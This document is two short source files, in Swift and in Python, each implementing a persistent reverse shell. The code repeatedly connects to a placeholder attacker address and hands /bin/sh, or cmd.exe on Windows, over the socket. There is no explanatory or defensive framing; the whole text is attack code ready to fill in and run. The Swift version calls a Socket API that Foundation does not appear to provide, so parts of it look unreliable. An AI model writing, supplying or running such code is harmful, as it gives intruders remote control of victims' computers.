File: revshell.swift
import Foundation

func connectToAttacker() {
    let attackerIP = "attacker_ip"
    let attackerPort: UInt16 = 0000

    while true {
        do {
            let socket = try Socket.create()
            try socket.connect(to: attackerIP, port: attackerPort)

            let process = Process()
            process.launchPath = "/bin/sh"
            process.standardInput = socket.asFileHandle()
            process.standardOutput = socket.asFileHandle()
            process.standardError = socket.asFileHandle()

            process.launch()
            process.waitUntilExit()

        } catch {
            print("Connection failed: \(error)")
            Thread.sleep(forTimeInterval: 5)
        }
    }
}

connectToAttacker()

File: revshell.py
import socket, subprocess, os, time

def connect_to_attacker():
    while True:
        try:
            attacker_ip = "attacker_ip"
            attacker_port = 0000
    
            s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((attacker_ip, attacker_port))

            if os.name == 'nt':
                subprocess.call(["cmd.exe"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
            else:
                subprocess.call(["/bin/sh", "-i"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
    
        except Exception as e:
            print(f"Connection failed: {e}")
            time.sleep(5)

if __name__ == "__main__":
    connect_to_attacker()